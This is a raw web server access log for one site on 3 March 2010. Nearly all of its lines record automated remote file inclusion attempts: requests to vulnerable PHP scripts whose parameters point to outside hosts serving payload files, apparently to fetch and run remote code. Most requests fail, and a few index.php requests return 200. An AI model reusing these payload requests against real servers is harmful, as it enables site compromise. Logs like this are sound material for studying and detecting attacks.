211.47.237.17 - - [03/Mar/2010:08:35:38 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:35:38 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:35:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:35:41 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:35:41 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:35:41 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:35:43 -0800] "GET /logs/access_100212.log%20%20//include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:35:46 -0800] "GET /logs/access_100212.log%20%20//include/admin.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:08:36:40 -0800] "GET /logs/access_100214.log//guestbook/errors.php?error=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:08:36:40 -0800] "GET /guestbook/errors.php?error=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:08:36:40 -0800] "GET /logs/access_100221.log//guestbook/errors.php?error=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:08:36:40 -0800] "GET /logs//guestbook/errors.php?error=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:37:11 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:37:11 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:37:11 -0800] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:08:37:19 -0800] "GET /logs/access_100204.log//include/admin.lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:38:00 -0800] "GET /logs/access_100209.log%20%20//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:38:11 -0800] "GET /skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:38:11 -0800] "GET /logs//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:38:11 -0800] "GET /logs/access_100209.log%20%20//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:38:49 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:38:49 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:08:38:50 -0800] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:39:09 -0800] "GET /logs/access_100213.log%20%20//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:08:39:59 -0800] "GET /logs/access_100221.log%20%20//guestbook/errors.php?error=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:41:08 -0800] "GET /logs/access_100213.log%20%20//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:42:55 -0800] "GET /logs//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:42:55 -0800] "GET /skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:42:55 -0800] "GET /logs/access_100209.log//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:42:57 -0800] "GET /skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:42:57 -0800] "GET /logs//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:42:57 -0800] "GET /logs/access_100209.log//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:43:32 -0800] "GET /logs/access_100213.log//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:08:43:34 -0800] "GET /logs/access_100213.log//skin/zero_vote/zboard4//skin/happycast/view.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [03/Mar/2010:08:46:02 -0800] "GET /logs/scripts.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.28.3.241 - - [03/Mar/2010:08:46:08 -0800] "GET / HTTP/1.0" 200 3626 "http://www.puaga.com/" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:48:47 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:49:04 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:49:04 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:49:04 -0800] "GET /logs/access_100217.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:49:05 -0800] "GET /logs/access_100203.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:49:21 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:49:21 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [03/Mar/2010:08:49:21 -0800] "GET /logs/access_100223.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [03/Mar/2010:08:49:39 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [03/Mar/2010:08:49:49 -0800] "GET /logs/access_100203.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:49:57 -0800] "GET /logs/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:49:57 -0800] "GET /logs/access_100210.log%20%20/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:49:57 -0800] "GET /index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:51:15 -0800] "GET /logs/access_100222.log%20%20/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:51:15 -0800] "GET /index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:51:16 -0800] "GET /logs/access_100210.log%20%20/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:52:30 -0800] "GET /logs/access_100222.log%20%20/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:52:31 -0800] "GET /logs/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:52:32 -0800] "GET /logs/access_100210.log%20%20/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:04 -0800] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:04 -0800] "GET /logs/access_100211.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:05 -0800] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:08 -0800] "GET /logs/access_100211.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:13 -0800] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:15 -0800] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:19 -0800] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:19 -0800] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:08:53:19 -0800] "GET /logs/access_100211.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:54:17 -0800] "GET /logs/access.log%20%20//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:54:17 -0800] "GET /logs//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:54:17 -0800] "GET /board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:54:19 -0800] "GET /logs/access_100222.log/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:54:19 -0800] "GET /logs/access_100210.log/index1.php?x=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:54:23 -0800] "GET /logs/access_100203.log%20%20//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:54:53 -0800] "GET /logs/access_100203.log%20%20/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:54:53 -0800] "GET /logs/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:54:53 -0800] "GET /index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:55:31 -0800] "GET /logs/wp-pass.php?_wp_http_referer=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [03/Mar/2010:08:55:31 -0800] "GET /wp-pass.php?_wp_http_referer=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:08:56:00 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:08:57:58 -0800] "GET /logs/access_091204.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:59:02 -0800] "GET /logs/access_100211.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:59:02 -0800] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:08:59:02 -0800] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:59:58 -0800] "GET /logs//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:59:58 -0800] "GET /board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:08:59:58 -0800] "GET /logs/access.log%20%20//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:09:00:58 -0800] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:09:00:58 -0800] "GET /logs/access_100211.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:09:00:58 -0800] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [03/Mar/2010:09:01:12 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [03/Mar/2010:09:01:12 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [03/Mar/2010:09:01:13 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:09:01:22 -0800] "GET /logs/access_100128.log%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:09:01:22 -0800] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:09:01:22 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:01:56 -0800] "GET /logs/access_100203.log%20%20/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:01:56 -0800] "GET /logs/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:01:57 -0800] "GET /index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:02:25 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:02:29 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:03:30 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:04:17 -0800] "GET /logs/access.log%20%20//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:04:17 -0800] "GET /board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:04:18 -0800] "GET /logs//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:09:04:24 -0800] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:09:04:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:09:04:26 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:04:31 -0800] "GET /logs/access_100203.log%20%20//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:09:05:41 -0800] "GET /logs/access_100211.log%20%20//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:09:05:51 -0800] "GET /logs/access_100211.log%20%20//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:06:07 -0800] "GET /logs/access.log%20%20//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:06:07 -0800] "GET /board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:06:11 -0800] "GET /logs/access_100203.log%20%20//board.php?code=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:06:53 -0800] "GET /logs/access_100224.log/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:06:53 -0800] "GET /logs/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:06:54 -0800] "GET /index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:07:32 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:09:07:42 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [03/Mar/2010:09:07:48 -0800] "GET /logs/access_100130.log//inc/header.php/step_one.php?server_inc=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:09:08:16 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:09:08:41 -0800] "GET /logs/access_100128.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
